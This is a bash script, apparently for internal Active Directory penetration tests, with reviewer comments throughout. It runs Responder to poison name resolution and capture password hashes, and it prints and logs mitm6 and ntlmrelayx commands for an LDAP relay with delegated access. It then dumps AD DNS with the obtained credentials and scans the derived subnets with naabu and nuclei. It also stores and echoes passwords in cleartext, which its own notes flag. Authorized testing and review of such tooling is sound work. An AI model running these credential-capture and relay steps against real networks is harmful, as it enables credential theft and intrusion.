#!/bin/bash
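#######################################
# Append one item to the run's todo list.
# Globals:   folder_name (read) - directory that holds todo.txt
# Arguments: $1 - the line to append
# Outputs:   appends one line to "${folder_name}/todo.txt"
# Returns:   0 on success, non-zero if the file cannot be written
#######################################
add_to_todo() {
  local item="$1"
  # printf instead of echo: an item that looks like an echo option (e.g. "-n")
  # or contains backslash sequences would otherwise be mangled or dropped.
  # NOTE(review): the path is relative to the current directory, so a relative
  # folder_name resolves differently once the script has cd'd into it.
  printf '%s\n' "$item" >> "${folder_name}/todo.txt"
}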
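#######################################
# Post a short status message to a Slack incoming webhook.
# The webhook URL is a bearer credential: anyone holding it can post to the
# channel, so it is read from the environment instead of being written into
# the script (the original embedded a live URL in a public gist).
# Globals:   SLACK_WEBHOOK_URL (read) - webhook endpoint; when unset the alert
#                                       is only logged to stderr
#            domain_name (read)       - prefixed to the message text
# Arguments: $1 - message text
# Outputs:   curl's response on stdout; diagnostics on stderr
# Returns:   0 when no webhook is configured, otherwise curl's exit status
#######################################
send_alert() {
  local message="$1"
  local webhook_url="${SLACK_WEBHOOK_URL:-}"
  if [[ -z "$webhook_url" ]]; then
    printf 'send_alert: SLACK_WEBHOOK_URL is not set; alert not sent: %s\n' "$message" >&2
    return 0
  fi
  # Escape the text so quotes, backslashes or newlines in the message cannot
  # break out of the JSON string (backslashes must be doubled first).
  local text="[${domain_name}] ${message}"
  text=${text//\\/\\\\}
  text=${text//\"/\\\"}
  text=${text//$'\n'/\\n}
  local payload="{\"text\":\"${text}\"}"
  curl -s --max-time 10 -X POST -H 'Content-type: application/json' --data "$payload" "$webhook_url"
}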
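# Check that the required tools exist and offer to install the missing ones.
# Review notes:
# - The original test looked for fixed paths under /usr/bin and
#   /usr/local/bin; `command -v` honours any location on PATH.
# - Release archives are fetched over HTTPS but were never integrity-checked
#   before being unpacked into /usr/bin as root. If MAPCIDR_SHA256,
#   NAABU_SHA256 or NUCLEI_SHA256 is set to the sha256 published for the
#   pinned release, the archive is verified with sha256sum first; leave them
#   unset to keep the original (unverified) behaviour.
# - The pip line installs the current HEAD of the adidnsdump repository; there
#   is no version pin.
# - Downloads go to a private mktemp directory instead of fixed names in /tmp
#   and are removed on exit; each download/extract step is checked so a failed
#   wget no longer leads to unzipping a missing file.
MAPCIDR_URL="https://github.com/projectdiscovery/mapcidr/releases/download/v1.1.16/mapcidr_1.1.16_linux_amd64.zip"
NAABU_URL="https://github.com/projectdiscovery/naabu/releases/download/v2.3.1/naabu_2.3.1_linux_amd64.zip"
NUCLEI_URL="https://github.com/projectdiscovery/nuclei/releases/download/v3.2.8/nuclei_3.2.8_linux_amd64.zip"

#######################################
# Download one release archive, optionally verify it, and unpack it to /usr/bin.
# Arguments: $1 - tool name (also the binary name inside the archive)
#            $2 - download URL
#            $3 - expected sha256 hex digest, or "" to skip verification
#            $4 - scratch directory that receives the archive
# Outputs:   diagnostics on stderr
# Returns:   0 on success, 1 if download, verification or extraction fails
#######################################
install_release_archive() {
  local tool="$1" url="$2" expected_sha="$3" scratch="$4"
  local archive="${scratch}/${tool}.zip"
  if ! wget -q "$url" -O "$archive"; then
    printf 'Download of %s failed: %s\n' "$tool" "$url" >&2
    return 1
  fi
  if [[ -n "$expected_sha" ]]; then
    # sha256sum -c reads "DIGEST  FILE" lines; --quiet suppresses the OK line.
    if ! printf '%s  %s\n' "$expected_sha" "$archive" | sha256sum -c --quiet -; then
      printf 'Checksum mismatch for %s; refusing to install it\n' "$tool" >&2
      return 1
    fi
  fi
  # -o: overwrite without prompting so a partial earlier install cannot hang
  # the script on unzip's interactive question.
  if ! sudo unzip -qq -o "$archive" -d /usr/bin/; then
    printf 'Extraction of %s failed\n' "$tool" >&2
    return 1
  fi
  sudo chmod +x "/usr/bin/${tool}"
}

missing_tools=()
for tool in mapcidr naabu nuclei adidnsdump; do
  command -v "$tool" >/dev/null 2>&1 || missing_tools+=("$tool")
done
if (( ${#missing_tools[@]} > 0 )); then
  printf 'One or more required applications are missing: %s\n' "${missing_tools[*]}"
  read -r -p "Would you like to install these tools? (y/n): " install_tools
  if [[ "$install_tools" == "y" ]]; then
    scratch_dir=$(mktemp -d) || { echo "mktemp failed" >&2; exit 1; }
    trap 'rm -rf -- "${scratch_dir:?}"' EXIT
    echo "Downloading required tools to ${scratch_dir}..."
    # Only the tools that are actually missing are installed.
    for tool in "${missing_tools[@]}"; do
      case "$tool" in
        adidnsdump)
          echo "Installing Python package..."
          python3 -m pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump >/dev/null || exit 1
          ;;
        mapcidr)
          install_release_archive mapcidr "$MAPCIDR_URL" "${MAPCIDR_SHA256:-}" "$scratch_dir" || exit 1
          ;;
        naabu)
          install_release_archive naabu "$NAABU_URL" "${NAABU_SHA256:-}" "$scratch_dir" || exit 1
          ;;
        nuclei)
          install_release_archive nuclei "$NUCLEI_URL" "${NUCLEI_SHA256:-}" "$scratch_dir" || exit 1
          ;;
      esac
    done
    echo "Download, extraction, and installation complete."
  else
    echo "Installation of required tools skipped. Please ensure the tools are installed manually."
    exit 1
  fi
fi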
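#######################################
# Ask the operator a question and fall back to a default on empty input.
# Arguments: $1 - prompt text
#            $2 - value returned when the operator enters nothing (or EOF)
# Outputs:   the chosen value on stdout; the prompt itself goes to stderr, so
#            callers can capture stdout with $(...)
# Returns:   0
#######################################
prompt_with_default() {
  local prompt_message="$1"
  local default_value="$2"
  local user_input
  # -r keeps backslashes literal (without it "a\b" is read back as "ab").
  read -r -p "${prompt_message} [${default_value}]: " user_input
  # printf rather than echo so an answer such as "-n" is printed verbatim.
  printf '%s\n' "${user_input:-$default_value}"
}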
# --- Main flow ---------------------------------------------------------------
# This run is fully interactive and executes at script load. Review notes:
# - Defaults are scraped from /etc/resolv.conf with grep/cut, which assumes
#   single-space field separation; a resolv.conf with several matching lines
#   leaves a newline-separated list in the variable.
# - After the cd below, every later path written as "${folder_name}/..." is
#   resolved relative to the new working directory, so a relative folder_name
#   produces a nested second copy of the directory.
# - username/password are not read until after the Responder phase, so the
#   todo entry added while has_creds is "y" contains empty values.
# - The password is echoed back in cleartext, stored in todo.txt, and placed
#   on command lines where it is visible to other local users via the process
#   list.
# Auto-populate variables
# "grep search" matches any line containing the word; cut -f2 keeps the first
# field after a single space, i.e. only the first search domain.
default_domain_name=$(cat /etc/resolv.conf | grep search | cut -d ' ' -f2)
default_folder_name="${default_domain_name}"
# First nameserver entry only (head -n 1).
default_dc_ip=$(cat /etc/resolv.conf | grep nameserver | cut -d ' ' -f2 | head -n 1)
# Prompt user for input with defaults
# read -p writes its prompt to stderr, so it is still shown while stdout is
# captured by $(...).
echo
folder_name=$(prompt_with_default "Enter folder name" "${default_folder_name}")
domain_name=$(prompt_with_default "Enter domain name" "${default_domain_name}")
dc_ip=$(prompt_with_default "Enter DC IP address" "${default_dc_ip}")
# Display entered variables
echo
echo "You have entered the following values:"
echo "-------------------------------------"
echo "Folder name: ${folder_name}"
echo "Domain name: ${domain_name}"
echo "DC IP address: ${dc_ip}"
echo "-------------------------------------"
echo
# Prompt user to validate the entered variables
read -p "Are these values correct? (y/n): " confirm
if [[ "$confirm" != "y" ]]; then
echo "Please run the script again and enter the correct values."
exit 1
fi
# Create the folder if it does not exist
mkdir -p "${folder_name}"
# NOTE(review): from here on the working directory is folder_name, but the
# script keeps prefixing paths with "${folder_name}/" (see the notes above).
cd "${folder_name}" || exit
# Prompt user if they have credentials
read -p "Do you have credentials? (y/n): " has_creds
# Check if credentials are provided early
if [[ "$has_creds" == "y" ]]; then
# NOTE(review): ${username} and ${password} are still unset at this point;
# they are only read further down, after the Responder loop.
add_to_todo "./linWinPwn.sh -t ${dc_ip} -d ${domain_name} -u ${username} -p ${password} -o ${folder_name} --auto"
fi
if [[ "$has_creds" != "y" ]]; then
echo "Starting the search for initial access..."
attempt_count=0
# Up to three 10-minute runs; the loop exits on the first run that finds
# files or after the third attempt.
while true; do
attempt_count=$((attempt_count+1))
echo "Running Responder for 10 minutes... (Attempt $attempt_count)"
# Interface name eth0 is hard-coded.
timeout 600 responder -I eth0 -wFdDPv
echo "Responder run complete."
# Search for new txt files in the responder logs folder
echo "Searching for new txt files in the responder logs folder..."
# -mtime -1 selects anything modified in the last 24 hours, not only files
# produced by this run; errors (e.g. missing logs dir) are silenced.
new_files=$(find /usr/share/responder/logs -type f -name "*.txt" -mtime -1 2>/dev/null)
if [[ -n "$new_files" ]]; then
echo "Found new files:"
echo "$new_files"
# Send alert before prompting to view files
send_alert "User input required: View Responder hashes."
read -p "Do you want to see the contents of these files? (y/n): " view_files
if [[ "$view_files" == "y" ]]; then
# NOTE(review): "$new_files" is the whole newline-separated list passed as
# ONE argument; with more than one match this names a file that does not
# exist.
sort -u -t: -k1,1 "$new_files"
# Create the responder_output folder within the specified folder
mkdir -p "${folder_name}/responder_output"
# Copy the new files to the responder_output folder
# NOTE(review): the unquoted $new_files is word-split and glob-expanded here,
# which breaks on paths containing whitespace.
cp $new_files "${folder_name}/responder_output/"
echo "New files copied to ${folder_name}/responder_output."
fi
break
elif [[ $attempt_count -eq 3 ]]; then
echo "Failed after 30 minutes. Maybe try mitm6."
echo "Tell the user to run the following commands in the other window:"
echo
echo "mitm6 -d ${domain_name}"
echo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access"
echo
echo "Move onto the next phase."
add_to_todo "mitm6 -d ${domain_name}"
add_to_todo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access"
break
else
echo "No new files found. Retrying..."
fi
done
fi
# Send alert before prompting for credentials
send_alert "User input required: Responder Done, Enter credentials."
# Prompt user for credentials
echo
read -p "Enter username: " username
# -s suppresses terminal echo while the password is typed.
read -sp "Enter password: " password
echo
# Display entered credentials
echo
echo "You have entered the following credentials:"
echo "-------------------------------------"
echo "Username: ${username}"
# NOTE(review): this prints the password in cleartext to the terminal (and to
# any scrollback or session recording), undoing the -s above.
echo "Password: ${password}"
echo "-------------------------------------"
echo
# Prompt user to validate the entered credentials
read -p "Are these credentials correct? (y/n): " confirm_creds
if [[ "$confirm_creds" != "y" ]]; then
echo "Please run the script again and enter the correct credentials."
exit 1
fi
# Open the URL in the background and disassociate the process
# Assumes something is already listening on localhost:8834; nothing in this
# script starts it.
nohup xdg-open https://localhost:8834 >/dev/null 2>&1 &
# Prompt user to run pingcastle.exe command
echo
echo "Please run the following command in a separate window:"
# NOTE(review): the password is embedded in the displayed command and written
# in cleartext to todo.txt on the next line.
echo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}"
add_to_todo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}"
echo
# Run adidnsdump
echo "Running adidnsdump..."
# NOTE(review): -p puts the password in argv, readable by other local users
# through the process list while the tool runs.
adidnsdump -u "${domain_name}\\${username}" -p "${password}" --dns-tcp "${dc_ip}"
echo "adidnsdump complete."
# Process records and run mapcidr
echo "Processing records and running mapcidr..."
# records.csv is read from the current directory; presumably written by the
# adidnsdump call above — confirm. The regex extracts dotted-quad IPv4
# addresses from the CSV; the pipeline fails silently if the file is absent.
cat records.csv | grep -Po '(?<![\d.])((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.|$)){4}(?![\d.])' | mapcidr -aa -o "${folder_name}/subnets.txt"
echo "Processing complete."
# Open the subnets.txt file in a text editor and disassociate the process
nohup xdg-open "${folder_name}/subnets.txt" >/dev/null 2>&1 &
# Run naabu and nuclei
echo "Running naabu and nuclei..."
# The cat could be replaced by an input redirection; output goes to nuclei.txt.
cat "${folder_name}/subnets.txt" | naabu | nuclei -severity critical,high,medium -o "${folder_name}/nuclei.txt"
echo "naabu and nuclei complete."
# Display the todo list
echo
echo "Todo list:"
cat "${folder_name}/todo.txt"